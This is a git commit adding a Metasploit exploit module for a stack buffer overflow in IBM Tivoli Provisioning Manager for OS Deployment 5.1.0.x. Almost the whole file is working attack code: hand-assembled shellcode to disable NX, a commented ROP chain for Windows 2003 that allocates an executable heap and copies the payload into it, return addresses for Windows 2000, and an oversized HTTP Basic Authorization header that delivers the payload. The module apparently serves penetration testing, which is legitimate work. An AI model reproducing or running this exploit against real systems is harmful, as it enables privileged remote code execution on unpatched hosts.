New module from toto
git-svn-id: file:///home/svn/framework3/trunk@4855 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
65cfd287e5
commit
56b74bb586
|
@ -0,0 +1,222 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::Http::Ibm_Tpmfosd_Overflow < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This is a stack overflow exploit for IBM Tivoli Provisioning Manager
|
||||
for OS Deployment version 5.1.0.X.
|
||||
},
|
||||
'Author' => 'toto',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 3583 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URI', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-05' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 0x200,
|
||||
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a",
|
||||
'Prepend' =>
|
||||
# Disable NX on 2k3 to upload data on the stack
|
||||
# (service crashes if the stack is switched to the heap)
|
||||
"\xb9\x70\x02\xfe\x7f" + # mov ecx, 0x7ffe0270
|
||||
"\x80\x39\x02" + # cmp byte ptr [ecx], 2
|
||||
"\x75\x15" + # jmp after
|
||||
"\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
|
||||
"\xb8\xed\x00\x00\x00" + # mov eax, 0xed
|
||||
"\x6a\x04" + # push 4
|
||||
"\x51" + # push ecx
|
||||
"\x6a\x22" + # push 22
|
||||
"\x6a\xff" + # push -1
|
||||
"\x6a\xff" + # push -1 (padding)
|
||||
"\xff\x12", # call dword ptr[edx]
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
['TMPfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }],
|
||||
# tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll)
|
||||
['TMPfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000 }],
|
||||
],
|
||||
'DisclosureDate' => 'May 02 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(443),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true]),
|
||||
], self.class )
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
if target.name =~ /2003/
|
||||
# the exploit allocates and executable heap to copy and execute the payload
|
||||
|
||||
auth = Rex::Text.rand_text_alphanumeric(2800)
|
||||
|
||||
ib = target['IB']
|
||||
|
||||
auth[ 2080, 4 ] = [ ib + 0x11010 ].pack('V') # store a data to prevent a crash
|
||||
|
||||
# ret 1:
|
||||
# 76a81a5f:
|
||||
# pop esi <- 0x76a91010
|
||||
# pop ebx <- 0x76a91010
|
||||
# pop ebp <- 0x76a91010
|
||||
# retn
|
||||
|
||||
auth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V')
|
||||
auth[ 2100, 4 ] = [ ib + 0x11010 ].pack('V')
|
||||
auth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V')
|
||||
auth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V')
|
||||
|
||||
# ret 2:
|
||||
# 76a817f0:
|
||||
# pop esi <- 0x76a81512 (ocscpy pointer)
|
||||
# retn
|
||||
|
||||
auth[ 2112, 4 ] = [ ib + 0x17f0 ].pack('V')
|
||||
auth[ 2116, 4 ] = [ ib + 0x1512 ].pack('V')
|
||||
|
||||
# ret 3: (copy the payload in atl.dll data)
|
||||
# 76a811c8
|
||||
# lea eax, [esp+3c] <-- eax points to the payload
|
||||
# push eax <- payload
|
||||
# push ebp <- 0x76a91010
|
||||
# call esi <- ocscpy
|
||||
# cmp eax, ebx <- eax == ebx = 0x76a91010
|
||||
# jnz before <- jump not taken
|
||||
# mov eax, ebp
|
||||
# pop edi
|
||||
# pop esi
|
||||
# pop ebp
|
||||
# pop ebx
|
||||
# add esp, 1ch
|
||||
# retn
|
||||
|
||||
auth[ 2120, 4 ] = [ ib + 0x11c8 ].pack('V')
|
||||
|
||||
|
||||
# ret 4: (increase the stack pointer to allow a jump back in the payload)
|
||||
# add esp, 1ch
|
||||
# retn
|
||||
|
||||
auth[ 2160, 4 ] = [ ib + 0x11da ].pack('V')
|
||||
auth[ 2184, 2 ] = "\xeb\x56" # jmp payload
|
||||
|
||||
|
||||
# ret 5: (create an executable heap - huge one)
|
||||
# 76a8c0c4
|
||||
# jmp ds:__imp_HeapCreate (0xffffffff, 0x01010101, 0x01010101)
|
||||
|
||||
auth[ 2196, 4 ] = [ ib + 0xc0c4 ].pack('V')
|
||||
|
||||
# ret 6:
|
||||
# 76a817f0
|
||||
# pop esi <- 0x76a92a38 (hHeap)
|
||||
# retn
|
||||
|
||||
auth[ 2204, 4 ] = [ ib + 0x17f0 ].pack('V')
|
||||
auth[ 2208, 4 ] = [ 0xffffffff ].pack('V')
|
||||
auth[ 2212, 4 ] = [ 0x01010101 ].pack('V')
|
||||
auth[ 2216, 4 ] = [ 0x01010101 ].pack('V')
|
||||
auth[ 2220, 4 ] = [ ib + 0x12a38 ].pack('V')
|
||||
|
||||
# ret 7:
|
||||
# 76a8190a
|
||||
# mov [esi], eax <- store new heap in hHeap
|
||||
# mov eax, esi
|
||||
# pop esi
|
||||
# retn 4
|
||||
|
||||
auth[ 2224, 4 ] = [ ib + 0x190a ].pack('V')
|
||||
|
||||
# ret 8 (_calloc - needed to allocate a small buffer to prevent a no mem exception):
|
||||
# 76a88a29
|
||||
# mov eax, [esp+arg_0] <- 0x7fffffa0
|
||||
# imul eax, [esp+arg_4] <- eax * 0x7fffffa0 = 0x2400
|
||||
# push eax
|
||||
# call _malloc
|
||||
# pop ecx <- ecx = 0x2400
|
||||
# retn
|
||||
|
||||
auth[ 2232, 4 ] = [ ib + 0x8a29 ].pack('V')
|
||||
|
||||
# ret 9:
|
||||
# 76a8c9ab
|
||||
# add esp, 0ch
|
||||
# retn 4
|
||||
|
||||
auth[ 2240, 4 ] = [ ib + 0xc9ab ].pack('V')
|
||||
auth[ 2244, 4 ] = [ 0x7fffffa0 ].pack('V')
|
||||
auth[ 2248, 4 ] = [ 0x7fffffa0 ].pack('V')
|
||||
|
||||
# ret 10 (copy payload into heap):
|
||||
# 76a8c9a0
|
||||
# push ecx <- 0x2400
|
||||
# push [esp+8] <- 0x76a91010 (payload in atl.dll data)
|
||||
# push eax <- heap pointer
|
||||
# call _memcpy
|
||||
# add esp, 0ch
|
||||
# retn
|
||||
|
||||
auth[ 2256, 4 ] = [ ib + 0xc9a0 ].pack('V')
|
||||
|
||||
# ret 11 (jump into heap)
|
||||
# 76a815e7
|
||||
# call eax
|
||||
|
||||
auth[ 2264, 4 ] = [ ib + 0x15e7 ].pack('V')
|
||||
auth[ 2268, 4 ] = [ ib + 0x11010 ].pack('V')
|
||||
|
||||
auth[ 2272, payload.encoded.length ] = payload.encoded
|
||||
|
||||
else
|
||||
auth = Rex::Text.rand_text_alphanumeric(2800)
|
||||
|
||||
auth[ 2080, 4 ] = [ target['Rets'][1] ].pack('V')
|
||||
auth[ 2096, 4 ] = [ target['Rets'][2] ].pack('V') # pop, ret
|
||||
auth[ 2100, 4 ] = [ target['Rets'][1] ].pack('V')
|
||||
auth[ 2104, 4 ] = [ target['Rets'][0] ].pack('V') # jmp esp
|
||||
auth[ 2108, payload.encoded.length ] = payload.encoded
|
||||
|
||||
end
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => '/',
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'Authorization' => "Basic #{auth}"
|
||||
}
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue